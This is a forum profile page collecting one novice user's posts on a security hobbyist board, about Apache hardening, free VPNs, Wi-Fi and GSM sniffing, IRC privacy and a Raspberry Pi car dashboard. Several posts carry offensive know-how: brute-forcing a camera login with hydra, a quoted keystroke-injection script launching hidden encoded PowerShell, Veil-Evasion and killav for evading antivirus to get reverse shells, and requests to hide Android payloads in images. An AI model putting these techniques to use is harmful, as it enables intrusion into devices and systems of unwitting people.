Posts posted by datajumper

  1. hey guys i have been searching a lot for how to secure my apache server ...i have found libapache-modsecurity

    the webserver is running on debian9 ...no gui lol

    but i followed the guides ..to turn SecRuleEngine on

    but when i do i try to restart ....service apache2 restart

    and apache is just dead in the water lol so now im turning to you guys

    maybe im not doing something right idk but i scanned my website with vega ...i know how to use lets encrypt i just havent done that part yet lol

    but vega says my site has xss flaws and sql and of course clear http ...bc i havent installed certbot yet

    but can any of you all tell me or give me advice on how to secure my apache2 server ?? modsecurity and add owasp rules-crs ?? im having a hard time understanding

    i really need help on this guys pls ..if i have been unclear because im not the best at explaining lol feel free to ask questions and ill try to explain better thanks in advance

  2. On 7/9/2017 at 0:14 PM, digip said:

    All your data belong to whoever owns the VPN. The VPN people own your traffic, shape it, injected/read/mangle, in other words, pwn all your shit. You don't put a free VPN on a web property you own that you want protected. Especially if you can roll OpenVPN from an Amazon instance of your own already (as far as I know). This is true of any company VPN service for the most part, but free ones are like free proxies. Free ones usually exist for a reason, and that's usually not "free" at the end of the day.

    In the above instance if he needs remote access to his own servers, he can roll his own OpenVPN setup on amazon, or just SSH into the system if he can set up SSH, which is probably already enabled. He could also proxychain and forward over SSH his own little subnet that bridges the two networks securely, which would be way safer than a free VPN service, which would cause all his server traffic to be open to the VPN network.

    oh wow man i had no clue i didnt know i was using vpnbook with kali anonsurf = tor with using tor do you still think they looked at my data ? man i want to learn more about this and do you have a good guide for rolling your own vpn ? actually im going to research that right now thanx for the info sincerely i appreciate it thanks again digip

  3. have you tried vpnbook ( google it ) all you do is download the certificate pack the password is on the web site where you download it

    once you download it just extract it choose which port you want to use theres a few in that folder like udp25000 udp443 udp80

    just pick which one you want i am using udp25000 open a terminal sudo su or sudo -s

    then its as simple as openvpn --config udp25000"file"

    just type openvpn --config then drag and drop that file in your terminal once its started just minimize it you close the terminal you kill

    your vpn but it works and its free the only downside is it dont support peer to peer downloading example like torrents bit torrent client

    pirate bay "example lol" but if you are just wanting a good vpn here you go man : ) just download one of the certificate bundles i actually

    alternate between the euro one and the US one lol if you need help holler : )

     

    https://www.vpnbook.com/freevpn

     

  4. the ip camera should just be setup like an access point if im not mistaken

    i dont know how yours is set up but you can use aircrack-ng the normal way like you do cracking a router and as for the web login url

    you should be able to use a wordlist and hydra to bruteforce email me or msg me on here it dont matter send me all the info ill do

    my best to help you oh lol i just skimmed over this forum i missed the part where you already have a handshake / pcap ? if thats correct we can use crunch or something to crack it then as for the log in use hydra either terminal command or hydra gtk ....forgive me if i skipped over any info and answered incorrectly

  5. i am an amateur at this but ....ill try to help lol if it dont help im sorry

    do you have these packages installed ? ..........

    • python-m2crypto
    • libgcrypt11
    • libgcrypt11-dev
    • libnl-dev

      dpkg -s python-m2crypto libgcrypt11 libgcrypt11-dev libnl-dev

    • If not, to install:

      apt-get install python-m2crypto libgcrypt11 libgcrypt11-dev libnl-dev

      https://askubuntu.com/questions/597546/iwconfig-wlan0-txpower-30mw-not-working

      its easier just to send u the link i found lol

      https://wireless.wiki.kernel.org/en/users/download

      https://www.kernel.org/pub/software/network/wireless-regdb/

      https://null-byte.wonderhowto.com/how-to/set-your-wi-fi-cards-tx-power-higher-than-30-dbm-0149606/

      its got something to do with the crda package is what everyone is saying i hope this helps if not just ignore me lol

  6. 11 minutes ago, Dave-ee Jones said:

    Yeah, I've got a Synology RT1900ac for a home router. The newer one, RT2600ac is a monster router but no need to upgrade..I also have an ASUS router as well, but that's not doing too much.

    Haha. It is a really long winded way :P
    Yeah, I was saying that more of a joke, though the colours and general look of those things is a bit boring and overdone. A simple black box is far more inconspicuous right?..It's either that or someone seeing the word 'TP-Link' on a small white router-looking box..

    oh i get it man lol yeah im not too fond of the colors myself haha and idk why but i actually like the stock firmware on the asus ..the one i had ..i cant remember the model off the top of my head but i done every kind of test i could think of at that thing then i even tried to brick it on purpose just for shits and giggles and the asus was unbrickable i know thats irrelevant i just thought id throw that out there lol good luck brother

  7. yeah lol i made the mistake of painting a yagi 2.4ghz antenna camouflage because i didnt want it to be seen ..but the paint had lead or something in it i guess

    and needless to say it never worked right after that ..it done great b4 i painted it lol so yeah i agree with barry be careful about the paint

  8. ive never used one of these but  someone told me about them a year  ago   

    TP-Link N300 Wireless Wi-Fi Nano

    https://www.amazon.com/TP-Link-Wireless-Travel-Extender-TL-WR802N/dp/B00TQEX8BO/ref=pd_lpo_vtph_147_bs_img_2?_encoding=UTF8&psc=1&refRID=DXFYWKJSM5BJAARNVWTD

    lol    ...or

    TP-Link N150 Wireless Wi-Fi Portable Router with Range Extender/Access Point/Client/Bridge Modes (TL-WR700N)

    https://www.amazon.com/TP-Link-Wireless-Portable-Extender-TL-WR700N/dp/B006DEBYWU

    you did say mini   i guess it depends on your project

  9. On 7/20/2016 at 5:12 PM, fugu said:

    this is untested, but I rewrote the hashing that your exploit is using. instead of the ror13 hash that was being used, I changed it to ror12. on virustotal now, kaspersky is unable to detect it, but it could be cause I created a bug that I don't know about in the process, like I said, i haven't tested it.

    
    DELAY 5000
    GUI r
    DELAY 1000
    STRING cmd
    ENTER
    DELAY 1000
    STRING powershell -nop -win hidden -noni -enc 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
    ENTER

     

    after STRING powershell -nop -win hidden -noni -enc then add shellcode .........can that be converted to digispark ....like using duckuino converter??

    im having problems adding my shellcode due to lack of space on the digispark are there any examples you can give me i just need a small reverse_tcp script to run on the digispark would you care to help me ? some guys on here gave me a few examples but when i use msfvenom to generate the shellcode its way too big i need help either to make it smaller or another method altogether and plz keep in mind even tho ive been using metasploit 4 a while im still a noob with all of this rubberducky and digispark programming stuff ...a copy and paste example would be nice lol the saying goes bigger is always better lol not in this case i need smaller

  10. if you use metasploit to gain a reverse_tcp connection once you gain a meterpreter session you can run the killav command

    but if the problem is that you cant get past the antivirus to drop your shell code or payload you can try Veil-Evasion

    create a payload with veil it has an option to encode ruby into your payload and several other methods

    or if you have physical access to the keyboard of the target machine and if you have enough time norton should be running in the bottom right

    hand corner just right click on the norton icon it should have a disable shields button .....disable it temporarily until you get whatever it is that you was trying to do

    but veil-evasion works 4 me gain a reverse tcp session then you are back doored in .... my recent exploit ...what i did was i had my metasploit listener setup at home

    then i put my veil-evasion payload on to a regular usb thumb drive and went to a friends house "i had permission lol" and i put it in the machine right clicked on the veil evasion payload and chose run as administrator and it walked past the antivirus no problem and i had my phone ssh 'd into my listening machine at home so i had full control on the go .......i know this isnt probably what you were looking for i hope it helped ...if not theres some really smart really experienced pentesters on this forum just hang around be patient one of these guys should be able to help

     

  11. oh man ive been thinking of doing this for a while ...if i can do it cheap enough im going 4 it lol

    you guys are awesome ! .... can this be done with a rtl sdr like the one darren kitchen had ? i think its like 20 bucks

    i only ask because i seen the link that dave ee jones posted about the evil socket but this is a great project if we can

    accomplish it i mean because everyone is going to cell phone my girlfriend doesnt even get on her laptop anymore at all

    good luck getting me to give up my laptop / desktop's lol ill be running linux til the world ends thanks 4 the idea thumbs up !!!

  12. oh ok so just an sdr ... ok cool ...so u said i cant actually attack the network like aircrack mdk3 etc ? thanks barry this gives me a better idea

    so basically if im getting this right i can look but not touch or listen i should say lol ive googled this and ive found some info uhmm but the guys are using these really

    expensive multi freq adapter like a huge box with all kinds of antennas lol but i have yet to find any attacks like aircrack like i mentioned but thank u so much again

  13. guys im still learning im really new to gsm 1900 mhz ....my question is and i dont mean to sound stupid but

    if i get a gsm antenna what wireless adapter or equipment do i need example like i have an alfa wireless adapter that i can put into monitor mode

    etc we all know how to sniff traffic on 2.4 ghz but how do i do the same thing with gsm signals or cdma for that matter i want to be on cell network

    like i do on 2.4ghz deauth clients so forth is there an affordable adapter like the alfa ive been looking but like i found this one it was like 300 dollars i just

    want a simple way to sniff gsm traffic and once i get the equipment what software do i use ...will aircrack work on gsm network ? if im unclear which im sure i am

    i will try my best to clarify my question ...just ask and as always guys thanks in advance ..i dont know unless i ask

  14. 4 hours ago, datajumper said:

    hey guys ive been exploiting my OWN !!! tablet and phone recently my phone is running marshmallow 6.0.1 the tablet uhmm ...kit kat ? something lol 4.4 i think lol

    ok ive created a payload with msfvenom and made the .apk payload and u have to accept the permissions and install and open the payload to run the binary right ?? ok

    what i want to know is just like in windows u can create shellcode and drop it into the cmd or drop it into a jpg file and it just runs your binary no questions asked lol

    is there any way to run some kind of shellcode "like" payload on android so i can send the payload via sms or email etc ... so when the user clicks on it it just runs the binary ?

    so basically what i would like is to embed a payload for android into a jpg /jpeg/png it has to be a picture i know about the pdf deal i want to do this with a picture ...if ive been unclear in any way feel free to ask i will try my best to explain better of what i want thanks in advance

    i cant wait to hear all your feedback good or bad i accept it all ty ....and special thanks to the whole hak5 community for just being here u all are great who else would i be able to ask questions like this to lmao

    i guess what im asking is there a payload i can drop on a device and all you have to do is open it without permissions ..install like a app ? just by opening it

  15. hey guys ive been exploiting my OWN !!! tablet and phone recently my phone is running marshmallow 6.0.1 the tablet uhmm ...kit kat ? something lol 4.4 i think lol

    ok ive created a payload with msfvenom and made the .apk payload and u have to accept the permissions and install and open the payload to run the binary right ?? ok

    what i want to know is just like in windows u can create shellcode and drop it into the cmd or drop it into a jpg file and it just runs your binary no questions asked lol

    is there any way to run some kind of shellcode "like" payload on android so i can send the payload via sms or email etc ... so when the user clicks on it it just runs the binary ?

    so basically what i would like is to embed a payload for android into a jpg /jpeg/png it has to be a picture i know about the pdf deal i want to do this with a picture ...if ive been unclear in any way feel free to ask i will try my best to explain better of what i want thanks in advance

    i cant wait to hear all your feedback good or bad i accept it all ty ....and special thanks to the whole hak5 community for just being here u all are great who else would i be able to ask questions like this to lmao

  16. thats actually what i was looking for is irc but i need to know more about irc traffic ...how easy can it be cracked is it encrypted ?

    can anyone sniff it i want to talk as comfortably as im talking to you now n0rpg0d

    and i agree these apps freak me out as well do u have any suggestions on which irc client to go with ?

    im running ubuntu behind a pfsense firewall .. and remember ive seen irc a bunch but ive never used it i dont know what to use

    is xchat safe ? i dont want no one sniffing my conversations is all lol ty very much for the feedback all of u all i dont know what i'd do without

    my community

  17. hey guys i want to get your opinion

    i want a touch screen dash like most of the newer vehicles out there i drive a 2002 chevy tahoe and it has a din and a half stereo

    i want to find a touch screen that will fit in the dash without modification lol no grinding the screen needs to be hdmi or run off gpio it just has to work

    with raspberry pi thats the first issue " the screen display and i absolutely want touch screen " no keyboard / mouse lol second issue im trying to figure out is fm receiver

    for the raspberry pi i'd like for it to use the factory antenna jack standard on all stereos and third issue is if i take up all the space in the dash with the screen i want to access the usb ports

    i can get a usb extension cable but i dont know where i could mount it lol ....guys just please comment and if u all come across something that u think will work 4 me please send me the links as always thanks in advance i appreciate each and every one of you thanks for being here : )

  18. ok guys me and a couple of friends was wanting some opinions

    what we want is some kind of communications that is 100% private ...we was thinking about irc

    what do u all think it needs to be encrypted traffic ?? or something we just want to chat and nobody can see what we talk about

    i've never even used irc im kinda new to it ...i know its been around forever but i'd like to know what you guys think

    thanks in advance
